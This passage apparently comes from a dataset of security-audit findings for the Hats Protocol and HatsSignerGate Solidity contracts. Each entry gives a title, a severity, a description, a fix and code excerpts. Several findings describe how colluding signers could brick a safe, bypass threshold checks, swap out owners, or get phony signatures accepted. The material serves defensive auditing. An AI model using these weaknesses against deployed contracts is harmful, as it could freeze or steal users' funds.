This could be done in a way that pushes the total over `maxSigners`, which will cause all future transactions to revert.\\nThis means that signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, owners can also be added by a normal `execTransaction` function. In this case, there are very few checks (all of which could easily or accidentally be missed) to stop us from adding too many owners:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nThat means that either in the case that (a) the safe's threshold is already at `targetThreshold` or (b) the owners being added are currently toggled off or have eligibility turned off, this check will pass and the owners will be added.\\nOnce they are added, all future transactions will fail. Each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert as long as the new owners are now activated as valid signers.\\nIn the worst case scenario, valid signers wearing an immutable hat are added as owners when the safe's threshold is already above `targetThreshold`. The check passes, but the new owners are already valid signers. 
There is no admin action that can revoke the validity of their hats, so the `reconcileSignerCount()` function will always revert, and therefore the safe is unusable.\\nSince `maxSigners` is immutable and can't be changed, the only solution is for the hat wearers to renounce their hats. Otherwise, the safe will remain unusable with all funds trapped inside.чThere should be a check in `checkAfterExecution()` that ensures that the number of owners on the safe has not changed throughout the execution.\\nIt also may be recommended that the `maxSigners` value is adjustable by the contract owner.чSigners can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nIn a less malicious case, signers might accidentally add too many owners and end up needing to manage the logistics of having users renounce their hats.ч```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n -HatsSignerGate + MultiHatsSignerGate: more than maxSignatures can be claimed which leads to DOS in reconcileSignerCountчhighчThe `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions allow users to become signers.\\nIt is important that both functions do not allow that there exist more valid signers than `maxSigners`.\\nThis is because if there are more valid signers than `maxSigners`, any call to `HatsSignerGateBase.reconcileSignerCount` reverts, which means that no transactions can be executed.\\nThe only possibility to resolve this is for a valid signer to give up his signer hat. 
No signer will voluntarily give up his signer hat. And it is wrong that a signer must give it up. Valid signers that have claimed before `maxSigners` was reached should not be affected by someone trying to become a signer and exceeding `maxSigners`. In other words the situation where one of the signers needs to give up his signer hat should have never occurred in the first place.\\nThink of the following scenario:\\n`maxSignatures=10` and there are 10 valid signers\\nThe signers execute a transaction that calls `Safe.addOwnerWithThreshold` such that there are now 11 owners (still there are 10 valid signers)\\nOne of the 10 signers is no longer a wearer of the hat and `reconcileSignerCount` is called. So there are now 9 valid signers and 11 owners\\nThe signer that was no longer a wearer of the hat in the previous step now wears the hat again. However `reconcileSignerCount` is not called. So there are 11 owners and 10 valid signers. The HSG however still thinks there are 9 valid signers.\\nWhen a new signer now calls `claimSigner`, all checks will pass and he will be swapped for the owner that is not a valid signer:\\n```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n\\nSo there are now 11 owners and 11 valid signers. 
This means when `reconcileSignerCount` is called, the following lines cause a revert:\\n```\\n function reconcileSignerCount() public {\\n address[] memory owners = safe.getOwners();\\n uint256 validSignerCount = _countValidSigners(owners);\\n\\n // 11 > 10\\n if (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n }\\n```\\nчThe `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions should call `reconcileSignerCount` such that they work with the correct amount of signers and the scenario described in this report cannot occur.\\n```\\ndiff --git a/src/HatsSignerGate.sol b/src/HatsSignerGate.sol\\nindex 7a02faa..949d390 100644\\n--- a/src/HatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/HatsSignerGate.sol\\n@@ -34,6 // Add the line below\\n34,8 @@ contract HatsSignerGate is HatsSignerGateBase {\\n /// @notice Function to become an owner on the safe if you are wearing the signers hat\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n function claimSigner() public virtual {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n\\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n\\n```\\ndiff --git a/src/MultiHatsSignerGate.sol b/src/MultiHatsSignerGate.sol\\nindex da74536..57041f6 100644\\n--- a/src/MultiHatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/MultiHatsSignerGate.sol\\n@@ -39,6 // Add the line below\\n39,8 @@ contract MultiHatsSignerGate is HatsSignerGateBase {\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. 
Swaps caller with existing invalid owner if relevant.\\n /// @param _hatId The hat id to claim signer rights for\\n function claimSigner(uint256 _hatId) public {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n \\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\nчAs mentioned before, we end up in a situation where one of the valid signers has to give up his signer hat in order for the HSG to become operable again.\\nSo one of the valid signers that has rightfully claimed his spot as a signer may lose his privilege to sign transactions.ч```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n -Signers can bypass checks and change threshold within a transactionчhighчThe `checkAfterExecution()` function has checks to ensure that the safe's threshold isn't changed by a transaction executed by signers. However, the parameters used by the check can be changed midflight so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors. From the docs:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nHowever, the restriction that the signers cannot change the threshold can be violated.\\nTo see how this is possible, let's check how this invariant is upheld. 
The following check is performed within the function:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nIf we look up `_getCorrectThreshold()`, we see the following:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nAs we can see, this means that the safe's threshold after the transaction must equal the valid signers, bounded by the `minThreshold` and `maxThreshold`.\\nHowever, this check does not ensure that the value returned by `_getCorrectThreshold()` is the same before and after the transaction. As a result, as long as the number of owners is also changed in the transaction, the condition can be upheld.\\nTo illustrate, let's look at an example:\\nBefore the transaction, there are 8 owners on the vault, all signers. targetThreshold == 10 and minThreshold == 2, so the safe's threshold is 8 and everything is good.\\nThe transaction calls `removeOwner()`, removing an owner from the safe and adjusting the threshold down to 7.\\nAfter the transaction, there will be 7 owners on the vault, all signers, the safe's threshold will be 7, and the check will pass.\\nThis simple example focuses on using `removeOwner()` once to decrease the threshold. 
However, it is also possible to use the safe's multicall functionality to call `removeOwner()` multiple times, changing the threshold more dramatically.чSave the safe's current threshold in `checkTransaction()` before the transaction has executed, and compare the value after the transaction to that value from storage.чSigners can change the threshold of the vault, giving themselves increased control over future transactions and breaking an important trust assumption of the protocol.ч```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n -Hats can be overwrittenчmediumчChild hats can be created under a non-existent admin. Creating the admin allows overwriting the properties of the child-hats, which goes against the immutability of hats.\\n```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n\\nNow, the next eligible hat for this admin is 1.1.1, which is a hat that was already created and minted. This can allow the admin to change the properties of the child, even if the child hat was previously immutable. This contradicts the immutability of hats, and can be used to rug users in multiple ways, and is thus classified as high severity. 
This attack can be carried out by any hat wearer on their child tree, mutating their properties.чCheck if admin exists, before minting by checking any of its properties against default values\\n```\\nrequire(_hats[admin].maxSupply > 0, \"Admin not created\")\\n```\\nчч```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n -targetThreshold can be set below minThreshold, violating important invariantчmediumчThere are protections in place to ensure that `minThreshold` is not set above `targetThreshold`, because the result is that the max threshold on the safe would be less than the minimum required. 
However, this check is not performed when `targetThreshold` is set, which results in the same situation.\\nWhen the `minThreshold` is set on `HatsSignerGateBase.sol`, it performs an important check that `minThreshold` <= targetThreshold:\\n```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n\\nHowever, when `targetThreshold` is set, there is no equivalent check that it remains above minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n\\nThis is a major problem, because if it is set lower than `minThreshold`, `reconcileSignerCount()` will set the safe's threshold to be this value, which is lower than the minimum, and will cause all transactions to fail.чPerform a check in `_setTargetThreshold()` that it is greater than or equal to minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n// Add the line below\\n if (_targetThreshold < minThreshold) {\\n// Add the line below\\n revert InvalidTargetThreshold();\\n// Add the line below\\n }\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\nчSettings that are intended to be guarded are not, which can lead to parameters being set in such a way that all transactions fail.ч```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n -Swap Signer fails if final owner is invalid due to off by one error in loopчmediumчNew users attempting to call `claimSigner()` when there is already a full slate of owners are 
supposed to kick any invalid owners off the safe in order to swap in and take their place. However, the loop that checks this has an off-by-one error that misses checking the final owner.\\nWhen `claimSigner()` is called, it adds the `msg.sender` as a signer, as long as there aren't already too many owners on the safe.\\nHowever, in the case that there are already the maximum number of owners on the safe, it performs a check whether any of them are invalid. If they are, it swaps out the invalid owner for the new owner.\\n```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n\\n```\\nfunction _swapSigner(\\n address[] memory _owners,\\n uint256 _ownerCount,\\n uint256 _maxSigners,\\n uint256 _currentSignerCount,\\n address _signer\\n) internal returns (bool success) {\\n address ownerToCheck;\\n bytes memory data;\\n\\n for (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n \"swapOwner(address,address,address)\",\\n _findPrevOwner(_owners, ownerToCheck), // prevOwner\\n ownerToCheck, // oldOwner\\n _signer // newOwner\\n );\\n\\n // execute the swap, reverting if it fails for some reason\\n success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecRemoveSigner();\\n }\\n\\n if (_currentSignerCount < _maxSigners) ++signerCount;\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nThis function is intended to iterate through all the owners, check if any is no longer valid, and — if that's the case — swap it for the new one.\\nHowever, in the case that all owners are valid except for the final one, it 
will miss the swap and reject the new owner.\\nThis is because there is an off by one error in the loop, where it iterates through `for (uint256 i; i < _ownerCount - 1;)...`\\nThis only iterates through all the owners up until the final one, and will miss the check for the validity and possible swap of the final owner.чPerform the loop with `ownerCount` instead of `ownerCount - 1` to check all owners:\\n```\\n// Remove the line below\\n for (uint256 i; i < _ownerCount // Remove the line below\\n 1;) {\\n// Add the line below\\n for (uint256 i; i < _ownerCount ;) {\\n ownerToCheck = _owners[i];\\n // rest of code\\n}\\n```\\nчWhen only the final owner is invalid, new users will not be able to claim their role as signer, even though they should.ч```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n -If a hat is owned by address(0), phony signatures will be accepted by the safeчmediumчIf a hat is sent to `address(0)`, the multisig will be fooled into accepting phony signatures on its behalf. This will throw off the proper accounting of signatures, allowing non-majority transactions to pass and potentially allowing users to steal funds.\\nIn order to validate that all signers of a transaction are valid signers, `HatsSignerGateBase.sol` implements the `countValidSignatures()` function, which recovers the signer for each signature and checks `isValidSigner()` on them.\\nThe function uses `ecrecover` to get the signer. However, `ecrecover` is well known to return `address(0)` in the event that a phony signature is passed with a `v` value other than 27 or 28. 
See this example for how this can be done.\\nIn the event that this is a base with only a single hat approved for signing, the `isValidSigner()` function will simply check if the owner is the wearer of a hat:\\n```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n\\nOn the `Hats.sol` contract, this simply checks their balance:\\n```\\nfunction isWearerOfHat(address _user, uint256 _hatId) public view returns (bool isWearer) {\\n isWearer = (balanceOf(_user, _hatId) > 0);\\n}\\n```\\n\\n... which only checks if it is active or eligible...\\n```\\nfunction balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n{\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n}\\n```\\n\\n... which calls out to ERC1155, which just returns the value in storage (without any address(0) check)...\\n```\\nfunction balanceOf(address owner, uint256 id) public view virtual returns (uint256 balance) {\\n balance = _balanceOf[owner][id];\\n}\\n```\\n\\nThe result is that, if a hat ends up owned by `address(0)` for any reason, this will give blanket permission for anyone to create a phony signature that will be accepted by the safe.\\nYou could imagine a variety of situations where this may apply:\\nAn admin minting a mutable hat to address(0) to adjust the supply while waiting for a delegatee to send over their address to transfer the hat to\\nAn admin sending a hat to address(0) because there is some reason why they need the supply slightly inflated\\nAn admin accidentally sending a hat to address(0) to burn it\\nNone of these examples are extremely likely, but there would be no reason for the admin to think they were putting their multisig at risk for doing so. 
However, the result would be a free signer on the multisig, which would have dramatic consequences.чThe easiest option is to add a check in `countValidSignatures()` that confirms that `currentOwner != address(0)` after each iteration.чIf a hat is sent to `address(0)`, any phony signature can be accepted by the safe, leading to transactions without sufficient support being executed.\\nThis is particularly dangerous in a 2/3 situation, where this issue would be sufficient for a single party to perform arbitrary transactions.ч```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n -If signer gate is deployed to safe with more than 5 existing modules, safe will be brickedчmediumч`HatsSignerGate` can be deployed with a fresh safe or connected to an existing safe. In the event that it is connected to an existing safe, it pulls the first 5 modules from that safe to count the number of connected modules. If there are more than 5 modules, it silently only takes the first five. This results in a mismatch between the real number of modules and `enabledModuleCount`, which causes all future transactions to revert.\\nWhen a `HatsSignerGate` is deployed to an existing safe, it pulls the existing modules with the following code:\\n```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n\\nBecause the modules are requested paginated with `5` as the second argument, it will return a maximum of `5` modules. 
If the safe already has more than `5` modules, only the first `5` will be returned.\\nThe result is that, while the safe has more than 5 modules, the gate will be set up with `enabledModuleCount = 5 + 1`.\\nWhen a transaction is executed, `checkTransaction()` will get the hash of the first 6 modules:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter the transaction, the first 7 modules will be checked to compare it:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nSince it already had more than 5 modules (now 6, with HatsSignerGate added), there will be a 7th module and the two hashes will be different. This will cause a revert.\\nThis would be a high severity issue, except that in the comments for the function it says:\\n/// @dev Do not attach HatsSignerGate to a Safe with more than 5 existing modules; its signers will not be able to execute any transactions\\nThis is the correct recommendation, but given the substantial consequences of getting it wrong, it should be enforced in code so that a safe with more modules reverts, rather than merely suggested in the comments.чThe `deployHatsSignerGate()` function should revert if attached to a safe with more than 5 modules:\\n```\\nfunction deployHatsSignerGate(\\n uint256 _ownerHatId,\\n uint256 _signersHatId,\\n address _safe, // existing Gnosis Safe that the signers will join\\n uint256 _minThreshold,\\n uint256 _targetThreshold,\\n uint256 _maxSigners\\n) public returns (address hsg) {\\n // count up the existing modules on the safe\\n (address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\n uint256 existingModuleCount = modules.length;\\n// Add the line below\\n (address[] 
memory modulesWithSix,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 6);\\n// Add the line below\\n if (modules.length != modulesWithSix.length) revert TooManyModules();\\n\\n return _deployHatsSignerGate(\\n _ownerHatId, _signersHatId, _safe, _minThreshold, _targetThreshold, _maxSigners, existingModuleCount\\n );\\n}\\n```\\nчIf a HatsSignerGate is deployed and connected to a safe with more than 5 existing modules, all future transactions sent through that safe will revert.ч```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n -[Medium][Outdated State] `_removeSigner` incorrectly updates `signerCount` and safe `threshold`чmediumч`_removeSigner` can be called whenever a signer is no longer valid to remove an invalid signer. However, under certain situations, `removeSigner` incorrectly reduces the number of `signerCount` and sets the `threshold` incorrectly.\\n`_removeSigner` uses the code snippet below to decide if the number of `signerCount` should be reduced:\\n```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n\\nThe first clause is supposed to be activated when `validSignerCount` and `currentSignerCount` are still in sync, and we want to remove an invalid signer. The second clause is for when we need to identify a previously active signer which is inactive now and want to remove it. However, it does not take into account if a previously in-active signer became active. 
In the scenario described below, the `signerCount` would be updated incorrectly:\\n(1) Let's imagine there are 5 signers where 0, 1 and 2 are active while 3 and 4 are inactive, the current `signerCount = 3` (2) In case number 3 regains its hat, it will become active again (3) If we want to delete signer 4 from the owners' list, the `_removeSigner` function will go through the signers and find 4 valid signers, since there were previously 3 signers, `validSignerCount == currentSignerCount` would be false. (4) In this case, while the number of `validSignerCount` increased, the `_removeSigner` reduces one.чCheck if the number of `validSignerCount` decreased instead of checking equality:\\n```\\n@line 387 HatsSignerGateBase\\n- if (validSignerCount == currentSignerCount) {\\n+ if (validSignerCount >= currentSignerCount) {\\n```\\nчThis can make the `signerCount` and safe `threshold` to update incorrectly which can cause further problems, such as incorrect number of signatures needed.ч```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n
calldata owners, uint256[] calldata ids)\\n public\\n view\\n virtual\\n returns (uint256[] memory balances)\\n {\\n require(owners.length == ids.length, \"LENGTH_MISMATCH\");\\n\\n balances = new uint256[](owners.length);\\n\\n // Unchecked because the only math done is incrementing\\n // the array index counter which cannot possibly overflow.\\n unchecked {\\n for (uint256 i = 0; i < owners.length; ++i) {\\n balances[i] = _balanceOf[owners[i]][ids[i]];\\n }\\n }\\n }\\n```\\nчConsider overriding the ERC1155.balanceOfBatch function in Hats contract to return 0 when the hat is inactive or the wearer is ineligible.чThis will make balanceOfBatch return a different result than balanceOf, which may cause errors when integrating with other projectsч```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n -Unbound recursive function call can use unlimited gas and break hats operationчmediumчsome of the functions in the Hats and HatsIdUtilities contracts has recursive logics without limiting the number of iteration, this can cause unlimited gas usage if hat trees has huge depth and it won't be possible to call the contracts functions. 
functions `getImageURIForHat()`, `isAdminOfHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` would revert and because most of the logics callings those functions so contract would be in broken state for those hats.\\nThis is function `isAdminOfHat()` code:\\n```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer 
of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n\\nAs you can see this function calls itself recursively to check that if user is wearer of the one of the upper link hats of the hat or not. if the chain(depth) of the hats in the tree become very long then this function would revert because of the gas usage and the gas usage would be high enough so it won't be possible to call this function in a transaction. functions `getImageURIForHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` has similar issues and the gas usage is depend on the tree depth. the issue can happen suddenly for hats if the top level topHat decide to add link, for example:\\nHat1 is linked to chain of the hats that has 1000 \"root hat\" and the topHat (tippy hat) is TIPHat1.\\nHat2 is linked to chain of the hats that has 1000 \"root hat\" and the topHat (tippy hat) is TIPHat2.\\nadmin of the TIPHat1 decides to link it to the Hat2 and all and after performing that the total depth of the tree would increase to 2000 and transactions would cost double time gas.чcode should check and make sure that hat levels has a maximum level and doesn't allow actions when this level breaches. 
(keep depth of each tophat's tree and update it when actions happens and won't allow actions if they increase depth higher than the threshold)чit won't be possible to perform actions for those hats and funds can be lost because of it.ч```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if 
(isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n -Owners can be swapped even though they still wear their signer hatsчmediumч`HatsSignerGateBase` does not check for a change of owners post-flight. This allows a group of actors to collude and replace opposing signers with cooperating signers, even though the replaced signers still wear their signer hats.\\nThe `HatsSignerGateBase` performs various checks to prevent a multisig transaction to tamper with certain variables. Something that is currently not checked for in `checkAfterExecution` is a change of owners. A colluding group of malicious signers could abuse this to perform swaps of safe owners by using a delegate call to a corresponding malicious contract. This would bypass the requirement of only being able to replace an owner if he does not wear his signer hat anymore as used in _swapSigner:\\n```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n \"swapOwner(address,address,address)\",\\n // rest of code\\n```\\nчPerform a pre- and post-flight comparison on the safe owners, analogous to what is currently done with the modules.чbypass restrictions and perform action that should be disallowed.ч```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n \"swapOwner(address,address,address)\",\\n // rest of code\\n```\\n -Safe can be bricked because threshold is updated with validSignerCount instead of newThresholdчhighчThe safe's threshold is supposed to be set with the lower value of the `validSignerCount` and the `targetThreshold` (intended to serve as the maximum). 
